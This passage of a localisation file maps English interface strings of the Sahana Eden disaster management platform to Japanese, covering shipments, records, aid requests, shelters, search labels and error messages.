'Real World Arbitrary Units': '実在の任意単位',
'Receive Items': '物資を受領',
'Receive Shipment': '輸送を受け取る',
'Receive this shipment?': 'この物資送付を受領しますか?',
'Receive': '物資受領',
'Received By': '物資受領責任者',
'Received Item Details': '配送済み物資の詳細',
'Received Item deleted': '受領した物資を削除しました',
'Received Item updated': '受領された物資を更新しました',
'Received Shipment Details': '受け取った輸送の詳細',
'Received Shipment canceled and items removed from Inventory': '受領した輸送をキャンセルしました。物資は備蓄から削除されます',
'Received Shipment canceled': '受け取った輸送をキャンセルしました',
'Received Shipment updated': '受領済みの配送物の情報が更新されました',
'Received Shipments': '受諾した輸送物資',
'Received': '受領済み',
'Receiving and Sending Items': '送付 / 受領した救援物資',
'Recipient': '受け取り担当者',
'Recipients': '受信者',
'Recommendations for Repair and Reconstruction or Demolition': '再築や取り壊し、修繕を推奨',
'Record %(id)s created': 'レコード %(id)s が作成されました',
'Record Created': '作成されたレコード',
'Record Details': 'レコードの詳細',
'Record ID': 'レコードID',
'Record Saved': 'レコードが保存されました',
'Record added': 'レコードを追加しました',
'Record any restriction on use or entry': '利用や入力に当たっての制限事項を記載',
'Record deleted': 'レコードを削除しました',
'Record last updated': '最近更新されたレコード',
'Record not found!': 'レコードが見つかりませんでした',
'Record updated': 'レコードを更新しました',
'Record': 'レコード',
'Recording and Assigning Assets': '物資の割り当てと記録',
'Records': 'レコード',
'Recovery Request added': '遺体の回収要請を追加しました',
'Recovery Request deleted': '遺体回収要請を削除しました',
'Recovery Request updated': '遺体回収要請を更新しました',
'Recovery Request': '遺体回収の要請',
'Recovery Requests': '遺体回収要請',
'Recovery report added': '遺体回収レポートを追加しました',
'Recovery report deleted': '遺体回収レポートを削除しました',
'Recovery report updated': '遺体回収レポートを更新しました',
'Recovery': '遺体回収',
'Recruitment': '人材募集',
'Recurring Cost': '経常費用',
'Recurring cost': '経常費用',
'Recurring costs': '経常費用',
'Recurring': '経常',
'Red': '赤',
'Reference Document': '関連文書',
'Region Location': '地域のロケーション',
'Regional': '国際支部',
'Register Person into this Shelter': 'この避難所に人物情報を登録',
'Register Person': '人物情報を登録',
'Register them as a volunteer': 'ボランティアとして登録',
'Register': '登録',
'Registered People': '登録した人物情報',
'Registered users can': '登録済みのユーザは',
'Registering ad-hoc volunteers willing to contribute': '貢献を希望する臨時ボランティアを登録',
'Registration Details': '登録情報詳細',
'Registration Disabled!': '現在アカウント登録は受け付けていません。',
'Registration added': '登録を追加しました',
'Registration entry deleted': '登録を削除しました',
'Registration is still pending approval from Approver (%s) - please wait until confirmation received.': '登録はまだ承認されていません (承認者:(%s)) -- 確認メールが届くまでもうしばらくお待ちください。',
'Registration key': '登録key',
'Registration successful': '登録に成功しました',
'Registration updated': '登録を更新しました',
'Registration': '登録',
'Registry keeps track of all the relief organizations working in the disaster region. It captures not only the places where they are active, but also captures information on the range of projects they are providing in each area.': '地域内で活動する全ての支援団体を追跡し、情報を保持します。これにより、各団体が活動している地域の情報だけでなく、それぞれの地域でどのような活動が行われているかも掌握することができます。',
'Rehabilitation/Long Term Care': 'リハビリ/長期介護',
'Reinforced masonry': '補強組積造',
'Rejected': '拒否されました',
'Reliable access to sanitation/hygiene items': 'サニタリ / 衛生用品の安定供給がある',
'Relief Item Catalog': '救援物資カタログ',
'Relief Item': '救援物資',
'Relief Items': '救援物資',
'Relief Team': '救援チーム',
'Relief': '救援',
'Religion': '宗教',
'Religious Leader': '宗教指導者',
'Religious': '宗教',
'Relocate as instructed in the <instruction>': '<instruction>の内容に従って再配置',
'Remove Feature: Select the feature you wish to remove & press the delete key': 'Featureの削除: 削除したいfeatureを選択し、削除キーを押下してください',
'Remove Person from Group': 'メンバシップを削除',
'Remove Person from Team': 'メンバシップを削除',
'Remove': '削除',
'Removed from Group': 'メンバシップを削除しました',
'Removed from Team': 'メンバシップを削除しました',
'Repeat your password': 'パスワードをもう一度入力してください',
'Replace if Master': 'マスターなら置換',
'Replace if Newer': '新しいものがあれば置き換える',
'Replace': '置換',
'Report Another Assessment...': '別のアセスメントをレポートする',
'Report Details': 'レポートの詳細',
'Report Resource': 'レポートリソース',
'Report Type': 'レポートタイプ',
'Report Types Include': 'レポートタイプを含む',
'Report a Problem with the Software': 'ソフトウェアの不具合を報告',
'Report added': 'レポートを追加しました',
'Report deleted': 'レポートを削除しました',
'Report my location': '自分の現在地を報告',
'Report that person missing': '行方不明者の情報を報告',
'Report the contributing factors for the current EMS status.': '現在の緊急受け入れ状態に影響している事由を記載',
'Report the contributing factors for the current OR status.': '現在の手術室の状況報告',
'Report the person as found': '人物の所在情報を報告',
'Report them as found': '発見として報告',
'Report them missing': '行方不明として報告',
'Report updated': 'レポートを更新しました',
'Report': 'レポート',
'Reporter Name': 'レポーターの氏名',
'Reporter': 'レポーター',
'Reporting on the projects in the region': 'この地域で展開しているプロジェクトのレポート',
'Reports': 'レポート',
'Request Added': '支援要請を追加しました',
'Request Canceled': '支援要請をキャンセルしました',
'Request Details': '支援要請の詳細',
'Request Item Details': '救援物資要請の詳細',
'Request Item added': '救援物資の要請を追加しました',
'Request Item deleted': '救援物資の要請を削除しました',
'Request Item updated': '救援物資の要請を更新しました',
'Request Item': '物資を要請',
'Request Items': '物資の要請',
'Request Status': '支援要請の状況',
'Request Type': '支援要請のタイプ',
'Request Updated': '支援要請を更新しました',
'Request added': '支援要請を追加しました',
'Request deleted': '支援要請を削除しました',
'Request for Role Upgrade': '上位権限の取得要求',
'Request updated': '支援要請を更新しました',
'Request': '支援要請',
'Request, Response & Session': '要求、応答、およびセッション',
'Requested By Site': '支援要請を行ったサイト',
'Requested By Warehouse': '倉庫からの要請',
'Requested By': '支援要求元',
'Requested Items': '支援要請が行われた物資',
'Requested by': '要求元',
'Requested on': '要請日',
'Requested': '要求済み',
'Requester': '要請の実施者',
'Requestor': '要請者',
'Requests From': '支援要請元',
'Requests for Item': '物資に関する要請',
'Requests': '支援要請',
'Requires Login!': 'ログインしてください。',
'Requires login': 'ログインが必要です',
'Rescue and recovery': '救出、あるいは遺体回収作業',
'Reset Password': 'パスワードのリセット',
'Reset form': 'フォームをクリア',
'Reset': 'リセット',
'Resize Feature: Select the feature you wish to resize & then Drag the associated dot to your desired size': 'Featureのリサイズ: リサイズしたいfeatureを選択し、適切なサイズになるようドラッグしてください',
'Resolve Conflict': '競合の解決',
'Resolve link brings up a new screen which helps to resolve these duplicate records and update the database.': '"解決"リンクでは、新しい画面を開き、重複している情報を解決してデータベースを更新します',
'Resolve': '解決',
'Resource Details': 'リソースの詳細',
'Resource added': 'リソースを追加しました',
'Resource deleted': 'リソースを削除しました',
'Resource updated': 'リソースを更新しました',
'Resource': 'リソース',
'Resources': 'リソース',
'Respiratory Infections': '呼吸器感染症',
'Response Details': '応答の詳細',
'Response added': '返答を追加しました',
'Response deleted': 'Responseを削除しました',
'Response updated': '返答を更新しました',
'Response': '対応',
'Responses': '対応',
'Restricted Access': 'アクセス制限中',
'Restricted Use': '制限された目的での使用',
'Restrictions': '制限',
'Results': '結果',
'Retail Crime': '小売犯罪',
'Retrieve Password': 'パスワードの取得',
'Rice': '米穀',
'Riot': '暴動',
'River Details': '河川の詳細',
'River added': '河川を追加しました',
'River deleted': '河川を削除しました',
'River updated': '河川を更新しました',
'River': '河川',
'Rivers': '河川',
'Road Accident': '道路事故',
'Road Closed': '道路(通行止め)',
'Road Conditions': '路面の状況',
'Road Delay': '道路遅延',
'Road Hijacking': '道路ハイジャック',
'Road Usage Condition': '道路の路面状況',
'Role Details': '権限の詳細',
'Role Name': '権限の名称',
'Role Required': '権限が必要',
'Role Updated': '権限を更新しました',
'Role added': '権限を追加しました',
'Role deleted': '権限を削除しました',
'Role updated': '権限を更新しました',
'Role': '権限',
'Role-based': '権限に基づいた',
'Roles Permitted': '許可された権限',
'Roles': '権限',
'Roof tile': '屋根瓦',
'Roofs, floors (vertical load)': '屋根、床板(鉛直荷重)',
'Roster': '名簿',
'Rotate Feature: Select the feature you wish to rotate & then Drag the associated dot to rotate to your desired location': '地物の回転: 回転させたい地物を選択し、目的の位置に回転させるために関連付けられた点をドラッグします。',
'Row Choices (One Per Line)': '行の選択肢(1行に1つ)',
'Rows in table': 'テーブルの行',
'Rows selected': '行が選択されました',
'Run Functional Tests': '動作テストの実行',
'Run Interval': '実行間隔',
'Running Cost': 'ランニングコスト',
'SITUATION': '状況',
'Safe environment for vulnerable groups': '被災者にとって安全な環境である',
'Safety Assessment Form': '安全性アセスメントフォーム',
'Safety of children and women affected by disaster': '被災した女性と未成年が保護されている',
'Sahana Administrator': 'Sahana管理者',
'Sahana Blue': 'Sahana ブルー',
'Sahana Community Chat': 'Sahanaコミュニティチャット',
'Sahana Eden <=> Other (Sahana Agasti, Ushahidi, etc.)': 'Sahana Eden <=> その他 (Sahana Agasti, Ushahidi 等.)',
'Sahana Eden <=> Other': 'Sahana Eden <=> 他のシステム',
'Sahana Eden Disaster Management Platform': 'Sahana Eden 被災地支援情報共有プラットフォーム',
'Sahana Eden Website': 'Sahana Eden公式ページ',
'Sahana Eden is a family of applications that provide solutions to coordination and collaboration for organizations working in disaster management.': 'Sahana Edenは、災害復旧に関わる様々な支援団体が、お互いに協力しあうために存在します。',
'Sahana FOSS Disaster Management System': 'Sahana オープンソース 被災地情報共有システム',
'Sahana Green': 'Sahana グリーン',
'Sahana Login Approval Pending': 'Sahana ログインは承認待ちです',
'Sahana access granted': 'Sahanaへのアクセス権を付与',
'Sahana: new request has been made. Please login to see if you can fulfil the request.': 'Sahana: 新しい支援要請が行われました。ログインして、支援要請を実現できるか確認してください。',
'Salted Fish': '塩漬けの魚',
'Salvage material usable from destroyed houses': '全壊した家屋から回収した物品(使用可能)',
'Salvage material usable from destroyed schools': '全壊した校舎から回収した物品(使用可能)',
'Sanitation problems': '衛生設備に問題',
'Satellite Office': '現地活動拠点',
'Satellite': '衛星',
'Saturday': '土曜日',
'Save any Changes in the one you wish to keep': '残す方の候補地へ行った変更を保存します。',
'Save': '保存',
'Save: Default Lat, Lon & Zoom for the Viewport': 'デフォルト表示範囲の緯度,経度,ズームレベルを保存',
'Saved.': '保存しました',
'Saving...': '保存しています...',
'Scale of Results': '結果の規模',
'Schedule': 'スケジュール',
'School Closure': '学校閉鎖',
'School Lockdown': '学校の厳重封鎖',
'School Reports': '学校のレポート',
'School Teacher': '学校教師',
'School activities': '学校の活動',
'School assistance received/expected': '学校用支援品を受領済み/受領予定',
'School assistance': '学校の援助',
'School attendance': '学校への出席状況',
'School destroyed': '校舎全壊',
'School heavily damaged': '校舎の深刻な損壊',
'School tents received': '仮校舎用テントを受領',
'School tents, source': '仮校舎用テント、送付元',
'School used for other purpose': '校舎を他目的で利用中',
'School': '学校',
'School/studying': '学校/勉強',
'Schools': '学校',
'Search & List Bin Types': 'Bin Typeを検索して一覧表示',
'Search & List Bins': 'Binsを検索して一覧表示',
'Search & List Catalog': 'カタログを検索して一覧表示',
'Search & List Category': 'カテゴリを検索して一覧表示',
'Search & List Items': '救援物資を検索して一覧表示',
'Search & List Locations': 'ロケーションを検索して一覧表示',
'Search & List Site': 'Siteを検索して一覧表示',
'Search & List Sub-Category': 'サブカテゴリを検索して一覧表示',
'Search & List Unit': '単位を検索して一覧表示',
'Search Activities': '支援活動の検索',
'Search Activity Report': '支援活動レポートの検索',
'Search Addresses': '住所を検索',
'Search Aid Requests': '援助要請を検索',
'Search Alternative Items': 'その他のアイテムを検索',
'Search Assessment Summaries': 'アセスメントの要約を検索',
'Search Assessments': 'アセスメントを検索',
'Search Asset Assignments': '資産割り当ての検索',
'Search Assets': '資産の検索',
'Search Baseline Type': 'Baseline Typeを検索',
'Search Baselines': '基準値の検索',
'Search Brands': '銘柄を検索',
'Search Budgets': '予算を検索',
'Search Bundles': 'Bundleを検索',
'Search Catalog Items': '救援物資カタログを検索',
'Search Category<>Sub-Category<>Catalog Relation': 'Category<>Sub-Category<>Catalog関係の検索',
'Search Checklists': 'チェックリストを検索',
'Search Cluster Subsectors': 'クラスタのサブセクタを検索',
'Search Clusters': 'クラスタを検索',
'Search Commitment Items': 'コミットされた救援物資の検索',
'Search Commitments': 'コミットの検索',
'Search Configs': '設定を検索',
'Search Contact Information': '連絡先情報を検索',
'Search Contacts': '連絡先を検索',
'Search Credentials': '証明書の検索',
'Search Distribution Items': '配給物資を検索',
'Search Distributions': '配給所を検索',
'Search Documents': 'ドキュメントを検索',
'Search Donors': '資金提供組織の検索',
'Search Existing Locations': '既存のロケーションを検索する',
'Search Feature Layers': 'Feature Layersの検索',
'Search Flood Reports': '洪水レポートの検索',
'Search Geonames': 'Geonamesの検索',
'Search Groups': 'グループの検索',
'Search Hospitals': '病院情報の検索',
'Search Identity': 'ID情報の検索',
'Search Images': '画像の検索',
'Search Impact Type': '被害の種類を検索',
'Search Impacts': '影響の検索',
'Search Incident Reports': 'インシデントレポートを検索',
'Search Incidents': 'インシデントの検索',
'Search Inventory Items': '備蓄物資を検索',
'Search Inventory Stores': '物資集積地点の検索',
'Search Item Catalog Category(s)': 'アイテムカタログカテゴリの検索',
'Search Item Catalog(s)': '救援物資カタログの検索',
'Search Item Categories': '救援物資カテゴリを検索',
'Search Item Packs': '物資のパックを検索',
'Search Item Sub-Category(s)': 'アイテムサブカテゴリの検索',
'Search Items': 'アイテムの検索',
'Search Keys': 'Keyの検索',
'Search Kits': 'Kitsの検索',
'Search Layers': 'レイヤの検索',
'Search Level 1 Assessments': 'レベル1アセスメントの検索',
'Search Level 2 Assessments': 'レベル2のアセスメントを検索',
'Search Locations': 'ロケーションの検索',
'Search Log Entry': 'ログエントリの検索',
'Search Map Profiles': '地図設定の検索',
'Search Markers': 'マーカーの検索',
'Search Members': 'メンバーの検索',
'Search Membership': 'メンバシップの検索',
'Search Memberships': 'メンバシップの検索',
'Search Metadata': 'メタデータの検索',
'Search Need Type': '需要タイプの検索',
'Search Needs': '必要な物資を検索',
'Search Notes': '追加情報を検索',
'Search Offices': 'オフィスの検索',
'Search Organizations': '団体の検索',
'Search Peer': '同期先を検索',
'Search Peers': 'データ同期先を検索',
'Search Personal Effects': 'Personal Effectsの検索',
'Search Persons': '人物情報の検索',
'Search Photos': '写真の検索',
'Search Positions': 'Positionsの検索',
'Search Problems': '問題の検索',
'Search Projections': '地図投影法の検索',
'Search Projects': 'プロジェクトの検索',
'Search Rapid Assessments': '被災地の現況アセスメントを検索',
'Search Received Items': '受領済み救援物資の検索',
'Search Received Shipments': '受信済みの出荷の検索',
'Search Records': 'レコードの検索',
'Search Recovery Reports': '遺体回収レポートを検索',
'Search Registations': '登録情報の検索',
'Search Registration Request': '登録要請を検索',
'Search Report': 'レポートの検索',
'Search Reports': 'レポートの検索',
'Search Request Items': '物資の要請を検索',
'Search Request': '支援要請の検索',
'Search Requested Items': '支援要請されている物資を検索',
'Search Requests': '支援要請の検索',
'Search Resources': 'リソースの検索',
'Search Responses': '対応の検索',
'Search Rivers': '河川を検索',
'Search Roles': '役割の検索',
'Search Sections': 'セクションの検索',
'Search Sectors': '活動分野を検索',
'Search Sent Items': '送付した物資を検索',
'Search Sent Shipments': '送信した出荷の検索',
'Search Service Profiles': 'サービスプロファイルの検索',
'Search Settings': '設定の検索',
'Search Shelter Services': '避難所での提供サービスを検索',
'Search Shelter Types': '避難所タイプの検索',
'Search Shelters': '避難所の検索',
'Search Shipment Transit Logs': '輸送履歴の検索',
'Search Shipment/Way Bills': '輸送費/渡航費の検索',
'Search Shipment<>Item Relation': '輸送と救援物資の関係性の検索',
'Search Site(s)': 'Siteの検索',
'Search Skill Types': 'スキルタイプの検索',
'Search Skills': 'スキルを検索',
'Search Solutions': '解決案の検索',
'Search Staff Types': 'スタッフタイプの検索',
'Search Staff': 'スタッフの検索',
'Search Status': '状態の検索',
'Search Storage Bin Type(s)': 'Storage Bin Typeの検索',
'Search Storage Bin(s)': 'Storage Bin(s)の検索',
'Search Storage Location(s)': '備蓄地点の検索',
'Search Subscriptions': '寄付申し込みを検索',
'Search Support Requests': '支援要求の検索',
'Search Tasks': 'タスクの検索',
'Search Teams': 'チームの検索',
'Search Themes': 'テーマの検索',
'Search Tickets': 'チケットの検索',
'Search Tracks': '追跡情報の検索',
'Search Twitter Tags': 'Twitterのタグを検索',
'Search Units': '単位の検索',
'Search Users': 'ユーザの検索',
'Search Volunteer Registrations': 'ボランティア登録の検索',
'Search Volunteers': 'ボランティアの検索',
'Search Warehouse Items': '倉庫の物資を検索',
'Search Warehouses': 'Warehousesの検索',
'Search and Edit Group': 'グループを検索して編集',
'Search and Edit Individual': '人物情報を検索して個別に編集',
'Search by ID Tag': 'IDタグで検索',
'Search for Items': '物資の検索',
'Search for a Hospital': '病院を探す',
'Search for a Location': '検索地域を指定します',
'Search for a Person': '人物を探す',
'Search for a Project': 'プロジェクトを探す',
'Search for a Request': '支援要請の検索',
'Search for a shipment received between these dates': 'ある期間内に受け取られた輸送を検索する',
'Search for an item by category.': 'カテゴリで物資を検索',
'Search for an item by text.': 'テキストで項目を検索',
'Search here for a person record in order to:': '人物情報を検索することで、以下の事柄を行うことができます。',
'Search messages': 'メッセージの検索',
'Search': '検索',
'Searching for different groups and individuals': '他のグループと個人を探す',
'Secondary Server (Optional)': 'セカンダリサーバ(オプション)',
'Seconds must be a number between 0 and 60': '秒には0-60の間の数字を記入してください',
'Seconds must be a number greater than 0 and less than 60': '秒は0から60の間で入力してください',
'Section Details': 'Sectionの詳細',
'Section deleted': 'Sectionを削除しました',
'Section updated': 'セクションを更新しました',
'Sections': 'セクション',
'Sector Details': '活動分野の詳細',
'Sector added': '活動分野を追加しました',
'Sector deleted': '活動分野を削除しました',
'Sector updated': '活動分野を更新しました',
'Sector': '活動分野',
'Sectors': '活動分野',
'Security Policy': 'セキュリティポリシー',
'Security Status': 'セキュリティステータス',
'Security problems': 'セキュリティーの問題',
'See unassigned recovery requests': 'まだ割り当てられていない遺体回収要請を見る',
'Seen': '発見情報あり',
'Select 2 potential locations from the dropdowns.': '候補地を2つ、ドロップダウンから選択します。',
'Select Items from the Request': '支援要請を基にアイテムを選択する',
'Select Items from this Inventory': '備蓄中の物資から選択',
'Select Language': '言語選択',
'Select Organization': '団体の選択',
'Select Photos': '写真の選択',
'Select a location': 'ロケーションを選択',
'Select a question from the list': 'リストから質問を選択してください',
'Select a range for the number of total beds': 'ベッド総数の範囲を選択',
'Select all that apply': '該当する項目を全て選択',
'Select an Organization to see a list of offices': '団体を選択すると、所属するオフィスが表示されます',
'Select an existing Location': '既に登録してあるロケーションを選択してください',
'Select the Cluster Layers for Assessments and Activities to analyse the Gaps:': 'アセスメントと支援活動のギャップを解析するクラスタの層を選択:',
'Select the overlays for Assessments and Activities relating to each Need to identify the gap.': 'オーバーレイを指定し、適切なアセスメントと支援活動を表示させてニーズを明確にします。',
'Select the person assigned to this role for this project.': 'この人物に、プロジェクト内の権限を担当させます。',
'Select the person associated with this scenario.': 'このタスクに関連する人物を選択してください。',
'Select to see a list of subdivisions.': '項目を選択すると、より細かい分類を選択できます。',
'Select to show this configuration in the Regions menu.': 'この設定を地域メニューに表示する場合に選択してください。',
'Select': '選択',
'Selects whether to use a Modem, Tropo or other Gateway for sending out SMS': 'SMS送信時に、モデム、Tropoまたはゲートウェイのどちらを使用するかを選択',
'Selects whether to use the gateway or the Modem for sending out SMS': 'SMS送信時、モデムとゲートウェイのどちらを使用するか選択',
'Self Registration': '本人による登録',
'Self-registration': '本人による登録',
'Send Alerts using Email &/or SMS': '電子メールまたはSMSを使用してアラートを送信',
'Send Items': '物資を送付',
'Send Mail': 'メール送信',
'Send Message': 'メッセージを送る',
'Send Notification': '通知を送信',
'Send Shipment': '輸送を開始する',
'Send from %s': '依頼主( %s )',
'Send message': 'メッセージ送信',
'Send new message': '新規メッセージ送信',
'Send': '物資送付',
'Sends & Receives Alerts via Email & SMS': '電子メール/SMS 経由でアラート送信/受信',
'Senior (50+)': '高齢者 (50+)',
'Sensitivity': '感度',
'Sent Item Details': '送付した物資の詳細',
'Sent Item deleted': '輸送済み物資を削除しました',
'Sent Item updated': '送付した救援物資を更新しました',
'Sent Shipment Details': '送付物資の詳細',
'Sent Shipment canceled and items returned to Inventory': '送付処理した輸送がキャンセルされ、物資は倉庫に戻りました',
'Sent Shipment canceled': '輸送開始をキャンセルしました',
'Sent Shipment updated': '送信した物資が更新されました',
'Sent Shipments': '物資を送付しました',
'Sent': '送信',
'Separate latrines for women and men': 'トイレは男女別である',
'Separated children, caregiving arrangements': '親と離れた子供だちのための保育手配',
'Seraiki': 'セライキ',
'Serial Number': 'シリアルナンバー',
'Series': 'シリーズ',
'Server': 'サーバ',
'Service Catalog': 'サービスカタログ',
'Service or Facility': 'サービス、または施設',
'Service profile added': 'サービスプロファイルを追加しました',
'Service profile deleted': 'サービスプロファイルを削除しました',
'Service profile updated': 'サービスプロファイルを更新しました',
'Service': 'サービス',
'Services Available': '利用可能なサービス',
'Services': 'サービス',
'Setting Details': '設定の詳細',
'Setting added': '設定を追加しました',
'Setting deleted': '設定を削除しました',
'Setting updated': '設定を更新しました',
'Settings updated': '設定を更新しました',
'Settings were reset because authenticating with Twitter failed': 'Twitterの認証に失敗したため、設定をクリアします',
'Settings': '設定',
'Severe': '深刻',
'Severity': '深刻度',
'Severity:': '深刻度:',
'Share a common Marker (unless over-ridden at the Feature level)': 'マーカーの共有 (機能レイヤで上書きされない限り)',
'Shelter & Essential NFIs': '避難所/生活用品',
'Shelter Details': '避難所の詳細',
'Shelter Name': '避難所名称',
'Shelter Registry': '避難所登録',
'Shelter Service Details': '避難所サービスの詳細',
'Shelter Service added': '避難所サービスを追加しました',
'Shelter Service deleted': '避難所サービスを削除しました',
'Shelter Service updated': '避難所サービスを更新しました',
'Shelter Service': '避難所サービス',
'Shelter Services': '避難所サービス',
'Shelter Type Details': '避難所タイプの詳細',
'Shelter Type added': '避難所タイプを追加しました',
'Shelter Type deleted': '避難所タイプを削除しました',
'Shelter Type updated': '避難所サービスを更新しました',
'Shelter Type': '避難所タイプ',
'Shelter Types and Services': '避難所のタイプとサービス',
'Shelter Types': '避難所タイプ',
'Shelter added': '避難所を追加しました',
'Shelter deleted': '避難所を削除しました',
'Shelter updated': '避難所を更新しました',
'Shelter': '避難所',
'Shelter/NFI Assistance': '避難所 / 生活用品支援',
'Shelter/NFI assistance received/expected': '避難所 / 生活必需品の支援を受領済み、あるいは受領予定',
'Shelters': '避難所',
'Shipment Created': '輸送が作成されました',
'Shipment Details': '輸送の詳細',
'Shipment Items received by Inventory': '備蓄地点で受領した輸送物資',
'Shipment Items sent from Inventory': '備蓄地点から送付した輸送物資',
'Shipment Items': '救援物資の輸送',
'Shipment Transit Log Details': '輸送履歴の詳細',
'Shipment Transit Log added': '輸送履歴を追加しました',
'Shipment Transit Log deleted': '輸送履歴を削除しました',
'Shipment Transit Log updated': '輸送履歴を更新しました',
'Shipment Transit Logs': '輸送履歴',
'Shipment/Way Bill added': '輸送/移動費を追加しました',
'Shipment/Way Bills Details': '輸送/移動費の詳細',
'Shipment/Way Bills deleted': '輸送/移動費を削除しました',
'Shipment/Way Bills updated': '輸送/移動費を更新しました',
'Shipment/Way Bills': '輸送/移動費',
'Shipment<>Item Relation added': '輸送<>物資間の関係を追加しました',
'Shipment<>Item Relation deleted': '輸送<>アイテム間の関係を削除しました',
'Shipment<>Item Relation updated': '輸送<>物資間の関係を更新しました',
'Shipment<>Item Relations Details': '輸送<>物資間の関係詳細',
'Shipment<>Item Relations': '輸送<>物資間の関係',
'Shipments To': '輸送先',
'Shipments': '輸送',
'Shooting': '銃撃',
'Short Assessment': '簡易評価',
'Short Description': '概要',
'Show Checklist': 'チェックリストを表示',
'Show Details': '詳細を表示',
'Show Map': '地図の表示',
'Show Region in Menu?': '地域をメニューで表示しますか?',
'Show on map': '地図上に表示',
'Sign-up as a volunteer': 'ボランティアとして登録する',
'Sign-up for Account': 'アカウント登録',
'Sign-up succesful - you should hear from us soon!': '登録できました。すぐに連絡が送られます。',
'Sindhi': 'シンド語',
'Site Address': 'サイトの住所',
'Site Administration': 'このサイト自体の管理',
'Site Description': 'サイトの説明',
'Site Details': 'Siteの詳細',
'Site ID': 'サイトID',
'Site Location Description': 'サイト ロケーションの説明',
'Site Location Name': 'サイトロケーション名',
'Site Manager': 'Site 管理者',
'Site Name': 'Site の名前',
'Site added': 'サイトを追加しました',
'Site deleted': 'サイトを削除しました',
'Site updated': 'サイトを更新しました',
'Site': 'サイト',
'Site/Warehouse': 'サイト/倉庫',
'Sites': 'サイト',
'Situation Awareness & Geospatial Analysis': '広域情報の取得や、地理情報の分析を行ないます',
'Sketch': 'スケッチ',
'Skill Details': 'スキルの詳細',
'Skill Status': 'スキル状況',
'Skill Type Details': 'スキルタイプの詳細',
'Skill Type added': 'スキルタイプを追加しました',
'Skill Type deleted': 'スキルタイプを削除しました',
'Skill Type updated': 'スキルタイプを更新しました',
'Skill Types': 'スキルタイプ',
'Skill added': 'スキルを追加しました',
'Skill deleted': 'スキルを削除しました',
'Skill updated': 'スキルを更新しました',
'Skill': 'スキル',
'Skills': 'スキル',
'Slope failure, debris': '斜面崩壊・崩壊堆積物',
'Small Trade': '小規模取引',
'Smoke': '煙',
'Snapshot Report': 'スナップショットレポート',
'Snapshot': 'スナップショット',
'Snow Fall': '降雪',
'Snow Squall': '豪雪',
'Soil bulging, liquefaction': '土壌隆起・液状化',
'Solid waste': '固形廃棄物',
'Solution Details': '解決案の詳細',
'Solution Item': '解決案項目',
'Solution added': '解決案を追加しました',
'Solution deleted': '解決案を削除しました',
'Solution updated': '解決案を更新しました',
'Solution': '解決案',
'Solutions': '解決案',
'Some': '散見',
'Sorry - the server has a problem, please try again later.': 'すみません、サーバーに問題が発生しています。時間を置いてやり直してください。',
'Sorry that location appears to be outside the area of the Parent.': 'このロケーションは親属性のエリアの外に表示されます。',
'Sorry that location appears to be outside the area supported by this deployment.': 'すいません、この位置は、このデプロイメントでサポートされている領域の外です。',
'Sorry, I could not understand your request': '残念ながら、リクエストが理解できませんでした。',
'Sorry, only users with the MapAdmin role are allowed to create location groups.': '申し訳ありませんが、 MapAdmin 権限を持つユーザだけがロケーションのグループを作れます',
'Sorry, only users with the MapAdmin role are allowed to edit these locations': '申し訳ありませんが、ロケーションの編集を行うにはMapAdmin権限を持ったユーザである必要があります。',
'Sorry, something went wrong.': 'すいません、何か問題が発生しています。',
'Sorry, that page is forbidden for some reason.': 'すいません、都合により、このページは閲覧禁止です。',
'Sorry, that service is temporary unavailable.': 'すいません、このサービスは一時的に利用不可となっています。',
'Sorry, there are no addresses to display': 'すいません、表示する住所がありません',
'Source ID': '情報元ID',
'Source Time': '情報ソース入手時刻',
'Source Type': '情報ソース種別',
'Source': '情報元',
'Sources of income': '収入源',
'Space Debris': '宇宙廃棄物',
'Spanish': 'スペイン語',
'Special Ice': '特別な氷',
'Special Marine': '特別海上',
'Special needs': '特別な要求',
'Specialized Hospital': '専門病院',
'Specific Area (e.g. Building/Room) within the Location that this Person/Group is seen.': 'ある人々やグループが見られるロケーションの中の特別な場所 (建物、部屋等)',
'Specific Location': '特定のロケーション',
'Specific locations need to have a parent of level': 'ロケーションを指定するには、そのロケーションの親属性指定が必要です',
'Specify a descriptive title for the image.': '画像の説明として一言タイトルをつけてください。',
'Specify the bed type of this unit.': 'この施設にある寝具の種別を指定してください',
'Specify the minimum sustainability in weeks or days.': '最短で何週間、あるいは何日以内に枯渇の可能性があるかを記載してください',
'Specify the number of available sets': '利用可能なセットの個数を入力してください',
'Specify the number of available units (adult doses)': '(成人が使用するとして)使用可能な個数を入力してください',
'Specify the number of available units (litres) of Ringer-Lactate or equivalent solutions': '使用可能な乳酸リンゲル液あるいは同等品のリッター数を入力してください',
'Specify the number of sets needed per 24h': '24時間ごとに必要なセットの数を指定する',
'Specify the number of units (adult doses) needed per 24h': '(成人が使用するとして)24時間ごとに必要な個数を入力してください',
'Specify the number of units (litres) of Ringer-Lactate or equivalent solutions needed per 24h': '24時間ごとに必要な乳酸リンゲル液あるいは同等品のリッター数を入力してください',
'Spherical Mercator?': '球面メルカトル?',
'Spreadsheet Importer': 'スプレッドシートの取り込み',
'Spreadsheet uploaded': 'スプレッドシートがアップロードされました',
'Spring': '湧き水',
'Squall': 'スコール',
'Staff 2': 'スタッフ 2',
'Staff Details': 'スタッフの詳細',
'Staff Type Details': 'スタッフタイプの詳細',
'Staff Type added': 'スタッフタイプを追加しました',
'Staff Type deleted': 'スタッフタイプを削除しました',
'Staff Type updated': 'スタッフタイプを更新しました',
'Staff Types': 'スタッフ分類',
'Staff added': 'スタッフを追加しました',
'Staff deleted': 'スタッフを削除しました',
'Staff present and caring for residents': '上記施設にスタッフが配置され、ケアを行っている',
'Staff updated': 'スタッフを更新しました',
'Staff': 'スタッフ',
'Staffing': 'スタッフ配備',
'Stairs': '階段',
'Start date and end date should have valid date values': '開始日と終了日は正しい値である必要があります',
'Start date': '開始日',
'Start of Period': '開始期間',
'Stationery': '文房具',
'Status Report': 'ステータスレポート',
'Status added': '状況が追加されました',
'Status deleted': 'ステータスを削除しました',
'Status of clinical operation of the facility.': '施設で行われている診療の状況を記載してください。',
'Status of general operation of the facility.': '施設の運用状況情報を記載してください。',
'Status of morgue capacity.': '死体安置所の収容状況です。',
'Status of operations of the emergency department of this hospital.': 'この病院の緊急手術室の状態です。',
'Status of security procedures/access restrictions in the hospital.': '病院のアクセス制限/セキュリティ手順の状態。',
'Status of the operating rooms of this hospital.': 'この病院の手術室の状態。',
'Status updated': '状況を更新しました',
'Status': 'ステータス',
'Steel frame': '鉄骨',
'Storage Bin Details': '物資保管場所の詳細',
'Storage Bin Number': 'Storage Bin番号',
'Storage Bin Type Details': '物資保管タイプの詳細',
